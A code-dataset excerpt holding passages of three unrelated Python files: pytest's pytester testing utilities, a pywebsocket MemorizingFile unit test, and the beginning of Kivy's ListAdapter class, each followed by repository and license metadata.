def before(hook_name, hook_impls, kwargs):
self.calls.append(ParsedCall(hook_name, kwargs))
def after(outcome, hook_name, hook_impls, kwargs):
pass
self._undo_wrapping = pluginmanager.add_hookcall_monitoring(before, after)
def finish_recording(self):
self._undo_wrapping()
def getcalls(self, names):
if isinstance(names, str):
names = names.split()
return [call for call in self.calls if call._name in names]
def assert_contains(self, entries):
__tracebackhide__ = True
i = 0
entries = list(entries)
backlocals = sys._getframe(1).f_locals
while entries:
name, check = entries.pop(0)
for ind, call in enumerate(self.calls[i:]):
if call._name == name:
print("NAMEMATCH", name, call)
if eval(check, backlocals, call.__dict__):
print("CHECKERMATCH", repr(check), "->", call)
else:
print("NOCHECKERMATCH", repr(check), "-", call)
continue
i += ind + 1
break
print("NONAMEMATCH", name, "with", call)
else:
pytest.fail("could not find %r check %r" % (name, check))
def popcall(self, name):
__tracebackhide__ = True
for i, call in enumerate(self.calls):
if call._name == name:
del self.calls[i]
return call
lines = ["could not find call %r, in:" % (name,)]
lines.extend([" %s" % str(x) for x in self.calls])
pytest.fail("\n".join(lines))
def getcall(self, name):
l = self.getcalls(name)
assert len(l) == 1, (name, l)
return l[0]
# functionality for test reports
def getreports(self,
names="pytest_runtest_logreport pytest_collectreport"):
return [x.report for x in self.getcalls(names)]
def matchreport(self, inamepart="",
names="pytest_runtest_logreport pytest_collectreport", when=None):
""" return a testreport whose dotted import path matches """
l = []
for rep in self.getreports(names=names):
try:
if not when and rep.when != "call" and rep.passed:
# setup/teardown passing reports - let's ignore those
continue
except AttributeError:
pass
if when and getattr(rep, 'when', None) != when:
continue
if not inamepart or inamepart in rep.nodeid.split("::"):
l.append(rep)
if not l:
raise ValueError("could not find test report matching %r: "
"no test reports at all!" % (inamepart,))
if len(l) > 1:
raise ValueError(
"found 2 or more testreports matching %r: %s" % (inamepart, l))
return l[0]
def getfailures(self,
names='pytest_runtest_logreport pytest_collectreport'):
return [rep for rep in self.getreports(names) if rep.failed]
def getfailedcollections(self):
return self.getfailures('pytest_collectreport')
def listoutcomes(self):
passed = []
skipped = []
failed = []
for rep in self.getreports(
"pytest_collectreport pytest_runtest_logreport"):
if rep.passed:
if getattr(rep, "when", None) == "call":
passed.append(rep)
elif rep.skipped:
skipped.append(rep)
elif rep.failed:
failed.append(rep)
return passed, skipped, failed
def countoutcomes(self):
return [len(x) for x in self.listoutcomes()]
def assertoutcome(self, passed=0, skipped=0, failed=0):
realpassed, realskipped, realfailed = self.listoutcomes()
assert passed == len(realpassed)
assert skipped == len(realskipped)
assert failed == len(realfailed)
def clear(self):
self.calls[:] = []
@pytest.fixture
def linecomp(request):
return LineComp()
@pytest.fixture(name='LineMatcher')
def LineMatcher_fixture(request):
return LineMatcher
@pytest.fixture
def testdir(request, tmpdir_factory):
return Testdir(request, tmpdir_factory)
rex_outcome = re.compile(r"(\d+) ([\w-]+)")
class RunResult:
"""The result of running a command.
Attributes:
:ret: The return value.
:outlines: List of lines captured from stdout.
:errlines: List of lines captures from stderr.
:stdout: :py:class:`LineMatcher` of stdout, use ``stdout.str()`` to
reconstruct stdout or the commonly used
``stdout.fnmatch_lines()`` method.
:stderrr: :py:class:`LineMatcher` of stderr.
:duration: Duration in seconds.
"""
def __init__(self, ret, outlines, errlines, duration):
self.ret = ret
self.outlines = outlines
self.errlines = errlines
self.stdout = LineMatcher(outlines)
self.stderr = LineMatcher(errlines)
self.duration = duration
def parseoutcomes(self):
""" Return a dictionary of outcomestring->num from parsing
the terminal output that the test process produced."""
for line in reversed(self.outlines):
if 'seconds' in line:
outcomes = rex_outcome.findall(line)
if outcomes:
d = {}
for num, cat in outcomes:
d[cat] = int(num)
return d
raise ValueError("Pytest terminal report not found")
def assert_outcomes(self, passed=0, skipped=0, failed=0, error=0):
""" assert that the specified outcomes appear with the respective
numbers (0 means it didn't occur) in the text output from a test run."""
d = self.parseoutcomes()
obtained = {
'passed': d.get('passed', 0),
'skipped': d.get('skipped', 0),
'failed': d.get('failed', 0),
'error': d.get('error', 0),
}
assert obtained == dict(passed=passed, skipped=skipped, failed=failed, error=error)
class Testdir:
"""Temporary test directory with tools to test/run pytest itself.
This is based on the ``tmpdir`` fixture but provides a number of
methods which aid with testing pytest itself. Unless
:py:meth:`chdir` is used all methods will use :py:attr:`tmpdir` as
current working directory.
Attributes:
:tmpdir: The :py:class:`py.path.local` instance of the temporary
directory.
:plugins: A list of plugins to use with :py:meth:`parseconfig` and
:py:meth:`runpytest`. Initially this is an empty list but
plugins can be added to the list. The type of items to add to
the list depend on the method which uses them so refer to them
for details.
"""
def __init__(self, request, tmpdir_factory):
self.request = request
self._mod_collections = WeakKeyDictionary()
# XXX remove duplication with tmpdir plugin
basetmp = tmpdir_factory.ensuretemp("testdir")
name = request.function.__name__
for i in range(100):
try:
tmpdir = basetmp.mkdir(name + str(i))
except py.error.EEXIST:
continue
break
self.tmpdir = tmpdir
self.plugins = []
self._savesyspath = (list(sys.path), list(sys.meta_path))
self._savemodulekeys = set(sys.modules)
self.chdir() # always chdir
self.request.addfinalizer(self.finalize)
method = self.request.config.getoption("--runpytest")
if method == "inprocess":
self._runpytest_method = self.runpytest_inprocess
elif method == "subprocess":
self._runpytest_method = self.runpytest_subprocess
def __repr__(self):
return "<Testdir %r>" % (self.tmpdir,)
def finalize(self):
"""Clean up global state artifacts.
Some methods modify the global interpreter state and this
tries to clean this up. It does not remove the temporary
directory however so it can be looked at after the test run
has finished.
"""
sys.path[:], sys.meta_path[:] = self._savesyspath
if hasattr(self, '_olddir'):
self._olddir.chdir()
self.delete_loaded_modules()
def delete_loaded_modules(self):
"""Delete modules that have been loaded during a test.
This allows the interpreter to catch module changes in case
the module is re-imported.
"""
for name in set(sys.modules).difference(self._savemodulekeys):
# some zope modules used by twisted-related tests keeps internal
# state and can't be deleted; we had some trouble in the past
# with zope.interface for example
if not name.startswith("zope"):
del sys.modules[name]
def make_hook_recorder(self, pluginmanager):
"""Create a new :py:class:`HookRecorder` for a PluginManager."""
assert not hasattr(pluginmanager, "reprec")
pluginmanager.reprec = reprec = HookRecorder(pluginmanager)
self.request.addfinalizer(reprec.finish_recording)
return reprec
def chdir(self):
"""Cd into the temporary directory.
This is done automatically upon instantiation.
"""
old = self.tmpdir.chdir()
if not hasattr(self, '_olddir'):
self._olddir = old
def _makefile(self, ext, args, kwargs, encoding="utf-8"):
items = list(kwargs.items())
if args:
source = py.builtin._totext("\n").join(
map(py.builtin._totext, args)) + py.builtin._totext("\n")
basename = self.request.function.__name__
items.insert(0, (basename, source))
ret = None
for name, value in items:
p = self.tmpdir.join(name).new(ext=ext)
p.dirpath().ensure_dir()
source = Source(value)
def my_totext(s, encoding="utf-8"):
if py.builtin._isbytes(s):
s = py.builtin._totext(s, encoding=encoding)
return s
source_unicode = "\n".join([my_totext(line) for line in source.lines])
source = py.builtin._totext(source_unicode)
content = source.strip().encode(encoding) # + "\n"
# content = content.rstrip() + "\n"
p.write(content, "wb")
if ret is None:
ret = p
return ret
def makefile(self, ext, *args, **kwargs):
"""Create a new file in the testdir.
ext: The extension the file should use, including the dot.
E.g. ".py".
args: All args will be treated as strings and joined using
newlines. The result will be written as contents to the
file. The name of the file will be based on the test
function requesting this fixture.
E.g. "testdir.makefile('.txt', 'line1', 'line2')"
kwargs: Each keyword is the name of a file, while the value of
it will be written as contents of the file.
E.g. "testdir.makefile('.ini', pytest='[pytest]\naddopts=-rs\n')"
"""
return self._makefile(ext, args, kwargs)
def makeconftest(self, source):
"""Write a contest.py file with 'source' as contents."""
return self.makepyfile(conftest=source)
def makeini(self, source):
"""Write a tox.ini file with 'source' as contents."""
return self.makefile('.ini', tox=source)
def getinicfg(self, source):
"""Return the pytest section from the tox.ini config file."""
p = self.makeini(source)
return py.iniconfig.IniConfig(p)['pytest']
def makepyfile(self, *args, **kwargs):
"""Shortcut for .makefile() with a .py extension."""
return self._makefile('.py', args, kwargs)
def maketxtfile(self, *args, **kwargs):
"""Shortcut for .makefile() with a .txt extension."""
return self._makefile('.txt', args, kwargs)
def syspathinsert(self, path=None):
"""Prepend a directory to sys.path, defaults to :py:attr:`tmpdir`.
This is undone automatically after the test.
"""
if path is None:
path = self.tmpdir
sys.path.insert(0, str(path))
# a call to syspathinsert() usually means that the caller
# wants to import some dynamically created files.
# with python3 we thus invalidate import caches.
self._possibly_invalidate_import_caches()
def _possibly_invalidate_import_caches(self):
# invalidate caches if we can (py33 and above)
try:
import importlib
except ImportError:
pass
else:
if hasattr(importlib, "invalidate_caches"):
importlib.invalidate_caches()
def mkdir(self, name):
"""Create a new (sub)directory."""
return self.tmpdir.mkdir(name)
def mkpydir(self, name):
"""Create a new python package.
This creates a (sub)directory with an empty ``__init__.py``
file so that is recognised as a python package.
"""
p = self.mkdir(name)
p.ensure("__init__.py")
return p
Session = Session
def getnode(self, config, arg):
"""Return the collection node of a file.
:param config: :py:class:`_pytest.config.Config` instance, see
:py:meth:`parseconfig` and :py:meth:`parseconfigure` to
create the configuration.
:param arg: A :py:class:`py.path.local` instance of the file.
"""
session = Session(config)
assert '::' not in str(arg)
p = py.path.local(arg)
config.hook.pytest_sessionstart(session=session)
res = session.perform_collect([str(p)], genitems=False)[0]
config.hook.pytest_sessionfinish(session=session, exitstatus=EXIT_OK)
return res
def getpathnode(self, path):
"""Return the collection node of a file.
This is like :py:meth:`getnode` but uses
:py:meth:`parseconfigure` to create the (configured) pytest
Config instance.
:param path: A :py:class:`py.path.local` instance of the file.
"""
config = self.parseconfigure(path)
session = Session(config)
x = session.fspath.bestrelpath(path)
config.hook.pytest_sessionstart(session=session)
res = session.perform_collect([x], genitems=False)[0]
config.hook.pytest_sessionfinish(session=session, exitstatus=EXIT_OK)
return res
def genitems(self, colitems):
"""Generate all test items from a collection node.
This recurses into the collection node and returns a list of
all the test items contained within.
"""
session = colitems[0].session
result = []
for colitem in colitems:
result.extend(session.genitems(colitem))
return result
def runitem(self, source):
"""Run the "test_func" Item.
The calling test instance (the class which contains the test
method) must provide a ``.getrunner()`` method which should
return a runner which can run the test protocol for a single
item, like e.g. :py:func:`_pytest.runner.runtestprotocol`.
"""
# used from runner functional tests
item = self.getitem(source)
# the test class where we are called from wants to provide the runner
testclassinstance = self.request.instance
runner = testclassinstance.getrunner()
return runner(item)
def inline_runsource(self, source, *cmdlineargs):
"""Run a test module in process using ``pytest.main()``.
This run writes "source" into a temporary file and runs
``pytest.main()`` on it, returning a :py:class:`HookRecorder`
instance for the result.
:param source: The source code of the test module.
:param cmdlineargs: Any extra command line arguments to use.
:return: :py:class:`HookRecorder` instance of the result.
"""
p = self.makepyfile(source)
l = list(cmdlineargs) + [p]
return self.inline_run(*l)
def inline_genitems(self, *args):
"""Run ``pytest.main(['--collectonly'])`` in-process.
Returns a tuple of the collected items and a
:py:class:`HookRecorder` instance.
This runs the :py:func:`pytest.main` function to run all of
pytest inside the test process itself like
:py:meth:`inline_run`. However the return value is a tuple of
the collection items and a :py:class:`HookRecorder` instance.
"""
rec = self.inline_run("--collect-only", *args)
items = [x.item for x in rec.getcalls("pytest_itemcollected")]
return items, rec
def inline_run(self, *args, **kwargs):
"""Run ``pytest.main()`` in-process, returning a HookRecorder.
This runs the :py:func:`pytest.main` function to run all of
pytest inside the test process itself. This means it can
return a :py:class:`HookRecorder` instance which gives more
detailed results from then run then can be done by matching
stdout/stderr from :py:meth:`runpytest`.
:param args: Any command line arguments to pass to
:py:func:`pytest.main`.
:param plugin: (keyword-only) Extra plugin instances the
``pytest.main()`` instance should use.
:return: A :py:class:`HookRecorder` instance.
"""
# When running py.test inline any plugins active in the main
# test process are already imported. So this disables the
# warning which will trigger to say they can no longer be
# re-written, which is fine as they are already re-written.
orig_warn = AssertionRewritingHook._warn_already_imported
def revert():
AssertionRewritingHook._warn_already_imported = orig_warn
self.request.addfinalizer(revert)
AssertionRewritingHook._warn_already_imported = lambda *a: None
rec = []
class Collect:
def pytest_configure(x, config):
rec.append(self.make_hook_recorder(config.pluginmanager))
plugins = kwargs.get("plugins") or []
plugins.append(Collect())
ret = pytest.main(list(args), plugins=plugins)
self.delete_loaded_modules()
if len(rec) == 1:
reprec = rec.pop()
else:
class reprec:
pass
reprec.ret = ret
# typically we reraise keyboard interrupts from the child run
# because it's our user requesting interruption of the testing
if ret == 2 and not kwargs.get("no_reraise_ctrlc"):
calls = reprec.getcalls("pytest_keyboard_interrupt")
if calls and calls[-1].excinfo.type == KeyboardInterrupt:
raise KeyboardInterrupt()
return reprec
def runpytest_inprocess(self, *args, **kwargs):
""" Return result of running pytest in-process, providing a similar
interface to what self.runpytest() provides. """
if kwargs.get("syspathinsert"):
self.syspathinsert()
now = time.time()
capture = MultiCapture(Capture=SysCapture)
capture.start_capturing()
try:
try:
reprec = self.inline_run(*args, **kwargs)
except SystemExit as e:
class reprec:
ret = e.args[0]
except Exception:
traceback.print_exc()
class reprec:
ret = 3
finally:
out, err = capture.readouterr()
capture.stop_capturing()
sys.stdout.write(out)
sys.stderr.write(err)
res = RunResult(reprec.ret,
out.split("\n"), err.split("\n"),
time.time() - now)
res.reprec = reprec
return res
def runpytest(self, *args, **kwargs):
""" Run pytest inline or in a subprocess, depending on the command line
option "--runpytest" and return a :py:class:`RunResult`.
"""
args = self._ensure_basetemp(args)
return self._runpytest_method(*args, **kwargs)
def _ensure_basetemp(self, args):
args = [str(x) for x in args]
for x in args:
if str(x).startswith('--basetemp'):
# print("basedtemp exists: %s" %(args,))
break
else:
args.append("--basetemp=%s" % self.tmpdir.dirpath('basetemp'))
# print("added basetemp: %s" %(args,))
return args
def parseconfig(self, *args):
"""Return a new pytest Config instance from given commandline args.
This invokes the pytest bootstrapping code in _pytest.config
to create a new :py:class:`_pytest.core.PluginManager` and
call the pytest_cmdline_parse hook to create new
:py:class:`_pytest.config.Config` instance.
If :py:attr:`plugins` has been populated they should be plugin
modules which will be registered with the PluginManager.
"""
args = self._ensure_basetemp(args)
import _pytest.config
config = _pytest.config._prepareconfig(args, self.plugins)
# we don't know what the test will do with this half-setup config
# object and thus we make sure it gets unconfigured properly in any
# case (otherwise capturing could still be active, for example)
self.request.addfinalizer(config._ensure_unconfigure)
return config
def parseconfigure(self, *args):
"""Return a new pytest configured Config instance.
This returns a new :py:class:`_pytest.config.Config` instance
like :py:meth:`parseconfig`, but also calls the
pytest_configure hook.
"""
config = self.parseconfig(*args)
config._do_configure()
self.request.addfinalizer(config._ensure_unconfigure)
return config
def getitem(self, source, funcname="test_func"):
"""Return the test item for a test function.
This writes the source to a python file and runs pytest's
collection on the resulting module, returning the test item
for the requested function name.
:param source: The module source.
:param funcname: The name of the test function for which the
Item must be returned.
"""
items = self.getitems(source)
for item in items:
if item.name == funcname:
return item
assert 0, "%r item not found in module:\n%s\nitems: %s" % (
funcname, source, items)
def getitems(self, source):
"""Return all test items collected from the module.
This writes the source to a python file and runs pytest's
collection on the resulting module, returning all test items
contained within.
"""
modcol = self.getmodulecol(source)
return self.genitems([modcol])
def getmodulecol(self, source, configargs=(), withinit=False):
"""Return the module collection node for ``source``.
This writes ``source`` to a file using :py:meth:`makepyfile`
and then runs the pytest collection on it, returning the
collection node for the test module.
:param source: The source code of the module to collect.
:param configargs: Any extra arguments to pass to
:py:meth:`parseconfigure`.
:param withinit: Whether to also write a ``__init__.py`` file
to the temporary directory to ensure it is a package.
"""
kw = {self.request.function.__name__: Source(source).strip()}
path = self.makepyfile(**kw)
if withinit:
self.makepyfile(__init__="#")
self.config = config = self.parseconfigure(path, *configargs)
node = self.getnode(config, path)
return node
def collect_by_name(self, modcol, name):
"""Return the collection node for name from the module collection.
This will search a module collection node for a collection
node matching the given name.
:param modcol: A module collection node, see
:py:meth:`getmodulecol`.
:param name: The name of the node to return.
"""
if modcol not in self._mod_collections:
self._mod_collections[modcol] = list(modcol.collect())
for colitem in self._mod_collections[modcol]:
if colitem.name == name:
return colitem
def popen(self, cmdargs, stdout, stderr, **kw):
"""Invoke subprocess.Popen.
This calls subprocess.Popen making sure the current working
directory is the PYTHONPATH.
You probably want to use :py:meth:`run` instead.
"""
env = os.environ.copy()
env['PYTHONPATH'] = os.pathsep.join(filter(None, [
str(os.getcwd()), env.get('PYTHONPATH', '')]))
kw['env'] = env
popen = subprocess.Popen(cmdargs, stdin=subprocess.PIPE, stdout=stdout, stderr=stderr, **kw)
popen.stdin.close()
return popen
def run(self, *cmdargs):
"""Run a command with arguments.
Run a process using subprocess.Popen saving the stdout and
stderr.
Returns a :py:class:`RunResult`.
"""
return self._run(*cmdargs)
def _run(self, *cmdargs):
cmdargs = [str(x) for x in cmdargs]
p1 = self.tmpdir.join("stdout")
p2 = self.tmpdir.join("stderr")
print("running:", ' '.join(cmdargs))
print(" in:", str(py.path.local()))
f1 = codecs.open(str(p1), "w", encoding="utf8")
f2 = codecs.open(str(p2), "w", encoding="utf8")
try:
now = time.time()
popen = self.popen(cmdargs, stdout=f1, stderr=f2,
close_fds=(sys.platform != "win32"))
ret = popen.wait()
finally:
f1.close()
f2.close()
f1 = codecs.open(str(p1), "r", encoding="utf8")
f2 = codecs.open(str(p2), "r", encoding="utf8")
try:
out = f1.read().splitlines()
err = f2.read().splitlines()
finally:
f1.close()
f2.close()
self._dump_lines(out, sys.stdout)
self._dump_lines(err, sys.stderr)
return RunResult(ret, out, err, time.time() - now)
def _dump_lines(self, lines, fp):
try:
for line in lines:
print(line, file=fp)
except UnicodeEncodeError:
print("couldn't print to %s because of encoding" % (fp,))
def _getpytestargs(self):
# we cannot use "(sys.executable,script)"
# because on windows the script is e.g. a pytest.exe
return (sys.executable, _pytest_fullpath,) # noqa
def runpython(self, script):
"""Run a python script using sys.executable as interpreter.
Returns a :py:class:`RunResult`.
"""
return self.run(sys.executable, script)
def runpython_c(self, command):
"""Run python -c "command", return a :py:class:`RunResult`."""
return self.run(sys.executable, "-c", command)
def runpytest_subprocess(self, *args, **kwargs):
"""Run pytest as a subprocess with given arguments.
Any plugins added to the :py:attr:`plugins` list will added
using the ``-p`` command line option. Addtionally
``--basetemp`` is used put any temporary files and directories
in a numbered directory prefixed with "runpytest-" so they do
not conflict with the normal numberd pytest location for
temporary files and directories.
Returns a :py:class:`RunResult`.
"""
p = py.path.local.make_numbered_dir(prefix="runpytest-",
keep=None, rootdir=self.tmpdir)
args = ('--basetemp=%s' % p, ) + args
# for x in args:
# if '--confcutdir' in str(x):
# break
# else:
# pass
# args = ('--confcutdir=.',) + args
plugins = [x for x in self.plugins if isinstance(x, str)]
if plugins:
args = ('-p', plugins[0]) + args
args = self._getpytestargs() + args
return self.run(*args)
def spawn_pytest(self, string, expect_timeout=10.0):
"""Run pytest using pexpect.
This makes sure to use the right pytest and sets up the
temporary directory locations.
The pexpect child is returned.
"""
basetemp = self.tmpdir.mkdir("temp-pexpect")
invoke = " ".join(map(str, self._getpytestargs()))
cmd = "%s --basetemp=%s %s" % (invoke, basetemp, string)
return self.spawn(cmd, expect_timeout=expect_timeout)
def spawn(self, cmd, expect_timeout=10.0):
"""Run a command using pexpect.
The pexpect child is returned.
"""
pexpect = pytest.importorskip("pexpect", "3.0")
if hasattr(sys, 'pypy_version_info') and '64' in platform.machine():
pytest.skip("pypy-64 bit not supported")
if sys.platform.startswith("freebsd"):
pytest.xfail("pexpect does not work reliably on freebsd")
logfile = self.tmpdir.join("spawn.out").open("wb")
child = pexpect.spawn(cmd, logfile=logfile)
self.request.addfinalizer(logfile.close)
child.timeout = expect_timeout
return child
def getdecoded(out):
try:
return out.decode("utf-8")
except UnicodeDecodeError:
return "INTERNAL not-utf8-decodeable, truncated string:\n%s" % (
py.io.saferepr(out),)
class LineComp:
def __init__(self):
self.stringio = py.io.TextIO()
def assert_contains_lines(self, lines2):
""" assert that lines2 are contained (linearly) in lines1.
return a list of extralines found.
"""
__tracebackhide__ = True
val = self.stringio.getvalue()
self.stringio.truncate(0)
self.stringio.seek(0)
lines1 = val.split("\n")
return LineMatcher(lines1).fnmatch_lines(lines2)
class LineMatcher:
"""Flexible matching of text.
This is a convenience class to test large texts like the output of
commands.
The constructor takes a list of lines without their trailing
newlines, i.e. ``text.splitlines()``.
"""
def __init__(self, lines):
self.lines = lines
self._log_output = []
def str(self):
"""Return the entire original text."""
return "\n".join(self.lines)
def _getlines(self, lines2):
if isinstance(lines2, str):
lines2 = Source(lines2)
if isinstance(lines2, Source):
lines2 = lines2.strip().lines
return lines2
def fnmatch_lines_random(self, lines2):
"""Check lines exist in the output.
The argument is a list of lines which have to occur in the
output, in any order. Each line can contain glob whildcards.
"""
lines2 = self._getlines(lines2)
for line in lines2:
for x in self.lines:
if line == x or fnmatch(x, line):
self._log("matched: ", repr(line))
break
else:
self._log("line %r not found in output" % line)
raise ValueError(self._log_text)
def get_lines_after(self, fnline):
"""Return all lines following the given line in the text.
The given line can contain glob wildcards.
"""
for i, line in enumerate(self.lines):
if fnline == line or fnmatch(line, fnline):
return self.lines[i + 1:]
raise ValueError("line %r not found in output" % fnline)
def _log(self, *args):
self._log_output.append(' '.join((str(x) for x in args)))
@property
def _log_text(self):
return '\n'.join(self._log_output)
def fnmatch_lines(self, lines2):
"""Search the text for matching lines.
The argument is a list of lines which have to match and can
use glob wildcards. If they do not match an pytest.fail() is
called. The matches and non-matches are also printed on
stdout.
"""
lines2 = self._getlines(lines2)
lines1 = self.lines[:]
nextline = None
extralines = []
__tracebackhide__ = True
for line in lines2:
nomatchprinted = False
while lines1:
nextline = lines1.pop(0)
if line == nextline:
self._log("exact match:", repr(line))
break
elif fnmatch(nextline, line):
self._log("fnmatch:", repr(line))
self._log(" with:", repr(nextline))
break
else:
if not nomatchprinted:
self._log("nomatch:", repr(line))
nomatchprinted = True
self._log(" and:", repr(nextline))
extralines.append(nextline)
else:
self._log("remains unmatched: %r" % (line,))
pytest.fail(self._log_text)
| hoehnp/navit_test | lib/python2.7/site-packages/_pytest/pytester.py | Python | gpl-2.0 | 40,423 |
#!/usr/bin/env python
#
# Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for memorizingfile module."""
import StringIO
import unittest
import config # This must be imported before mod_pywebsocket.
from mod_pywebsocket import memorizingfile
class UtilTest(unittest.TestCase):
def check(self, memorizing_file, num_read, expected_list):
for unused in range(num_read):
memorizing_file.readline()
actual_list = memorizing_file.get_memorized_lines()
self.assertEqual(len(expected_list), len(actual_list))
for expected, actual in zip(expected_list, actual_list):
self.assertEqual(expected, actual)
def test_get_memorized_lines(self):
memorizing_file = memorizingfile.MemorizingFile(StringIO.StringIO(
'Hello\nWorld\nWelcome'))
self.check(memorizing_file, 3, ['Hello\n', 'World\n', 'Welcome'])
def test_get_memorized_lines_limit_memorized_lines(self):
memorizing_file = memorizingfile.MemorizingFile(StringIO.StringIO(
'Hello\nWorld\nWelcome'), 2)
self.check(memorizing_file, 3, ['Hello\n', 'World\n'])
def test_get_memorized_lines_empty_file(self):
memorizing_file = memorizingfile.MemorizingFile(StringIO.StringIO(
''))
self.check(memorizing_file, 10, [])
if __name__ == '__main__':
unittest.main()
# vi:sts=4 sw=4 et
| EpicCM/SPH-D700-Kernel | external/webkit/WebKitTools/pywebsocket/test/test_memorizingfile.py | Python | gpl-2.0 | 2,887 |
'''
ListAdapter
=================
.. versionadded:: 1.5
.. warning::
This code is still experimental, and its API is subject to change in a
future version.
A :class:`ListAdapter` is an adapter around a python list.
Selection operations are a main concern for the class.
From an :class:`Adapter`, a :class:`ListAdapter` gets cls, template, and
args_converter properties and adds others that control selection behaviour:
* *selection*, a list of selected items.
* *selection_mode*, 'single', 'multiple', 'none'
* *allow_empty_selection*, a boolean -- If False, a selection is forced. If
True, and only user or programmatic action will change selection, it can
be empty.
If you wish to have a bare-bones list adapter, without selection, use a
:class:`~kivy.adapters.simplelistadapter.SimpleListAdapter`.
A :class:`~kivy.adapters.dictadapter.DictAdapter` is a subclass of a
:class:`~kivy.adapters.listadapter.ListAdapter`. They both dispatch the
*on_selection_change* event.
:Events:
`on_selection_change`: (view, view list )
Fired when selection changes
.. versionchanged:: 1.6.0
Added data = ListProperty([]), which was proably inadvertently deleted at
some point. This means that whenever data changes an update will fire,
instead of having to reset the data object (Adapter has data defined as
an ObjectProperty, so we need to reset it here to ListProperty). See also
DictAdapter and its set of data = DictProperty().
'''
__all__ = ('ListAdapter', )
import inspect
from kivy.event import EventDispatcher
from kivy.adapters.adapter import Adapter
from kivy.adapters.models import SelectableDataItem
from kivy.properties import ListProperty
from kivy.properties import DictProperty
from kivy.properties import BooleanProperty
from kivy.properties import OptionProperty
from kivy.properties import NumericProperty
from kivy.lang import Builder
class ListAdapter(Adapter, EventDispatcher):
'''
A base class for adapters interfacing with lists, dictionaries or other
collection type data, adding selection, view creation and management
functonality.
'''
data = ListProperty([])
'''The data list property is redefined here, overriding its definition as
an ObjectProperty in the Adapter class. We bind to data so that any
changes will trigger updates. See also how the
:class:`~kivy.adapters.DictAdapter` redefines data as a
:class:`~kivy.properties.DictProperty`.
:attr:`data` is a :class:`~kivy.properties.ListProperty` and defaults
to [].
'''
selection = ListProperty([])
'''The selection list property is the container for selected items.
:attr:`selection` is a :class:`~kivy.properties.ListProperty` and defaults
to [].
'''
selection_mode = OptionProperty('single',
options=('none', 'single', 'multiple'))
'''Selection modes:
* *none*, use the list as a simple list (no select action). This option
is here so that selection can be turned off, momentarily or
permanently, for an existing list adapter.
A :class:`~kivy.adapters.listadapter.ListAdapter` is not meant to be
used as a primary no-selection list adapter. Use a
:class:`~kivy.adapters.simplelistadapter.SimpleListAdapter` for that.
* *single*, multi-touch/click ignored. Single item selection only.
* *multiple*, multi-touch / incremental addition to selection allowed;
may be limited to a count by selection_limit
:attr:`selection_mode` is an :class:`~kivy.properties.OptionProperty` and
defaults to 'single'.
'''
propagate_selection_to_data = BooleanProperty(False)
'''Normally, data items are not selected/deselected because the data items
might not have an is_selected boolean property -- only the item view for a
given data item is selected/deselected as part of the maintained selection
list. However, if the data items do have an is_selected property, or if
they mix in :class:`~kivy.adapters.models.SelectableDataItem`, the
selection machinery can propagate selection to data items. This can be
useful for storing selection state in a local database or backend database
for maintaining state in game play or other similar scenarios. It is a
convenience function.
To propagate selection or not?
Consider a shopping list application for shopping for fruits at the
market. The app allows for the selection of fruits to buy for each day of
the week, presenting seven lists: one for each day of the week. Each list is
loaded with all the available fruits, but the selection for each is a
subset. There is only one set of fruit data shared between the lists, so
it would not make sense to propagate selection to the data because
selection in any of the seven lists would clash and mix with that of the
others.
However, consider a game that uses the same fruits data for selecting
fruits available for fruit-tossing. A given round of play could have a
full fruits list, with fruits available for tossing shown selected. If the
game is saved and rerun, the full fruits list, with selection marked on
each item, would be reloaded correctly if selection is always propagated to
the data. You could accomplish the same functionality by writing code to
operate on list selection, but having selection stored in the data
ListProperty might prove convenient in some cases.
:attr:`propagate_selection_to_data` is a
:class:`~kivy.properties.BooleanProperty` and defaults to False.
'''
allow_empty_selection = BooleanProperty(True)
'''The allow_empty_selection may be used for cascading selection between
several list views, or between a list view and an observing view. Such
automatic maintenance of the selection is important for all but simple
list displays. Set allow_empty_selection to False and the selection is
auto-initialized and always maintained, so any observing views
may likewise be updated to stay in sync.
:attr:`allow_empty_selection` is a
:class:`~kivy.properties.BooleanProperty` and defaults to True.
'''
selection_limit = NumericProperty(-1)
'''When the selection_mode is multiple and the selection_limit is
non-negative, this number will limit the number of selected items. It can
be set to 1, which is equivalent to single selection. If selection_limit is
not set, the default value is -1, meaning that no limit will be enforced.
:attr:`selection_limit` is a :class:`~kivy.properties.NumericProperty` and
defaults to -1 (no limit).
'''
cached_views = DictProperty({})
'''View instances for data items are instantiated and managed by the
adapter. Here we maintain a dictionary containing the view
instances keyed to the indices in the data.
This dictionary works as a cache. get_view() only asks for a view from
the adapter if one is not already stored for the requested index.
:attr:`cached_views` is a :class:`~kivy.properties.DictProperty` and
defaults to {}.
'''
__events__ = ('on_selection_change', )
def __init__(self, **kwargs):
super(ListAdapter, self).__init__(**kwargs)
self.bind(selection_mode=self.selection_mode_changed,
allow_empty_selection=self.check_for_empty_selection,
data=self.update_for_new_data)
self.update_for_new_data()
def delete_cache(self, *args):
self.cached_views = {}
def get_count(self):
return len(self.data)
def get_data_item(self, index):
if index < 0 or index >= len(self.data):
return None
return self.data[index]
def selection_mode_changed(self, *args):
if self.selection_mode == 'none':
for selected_view in self.selection:
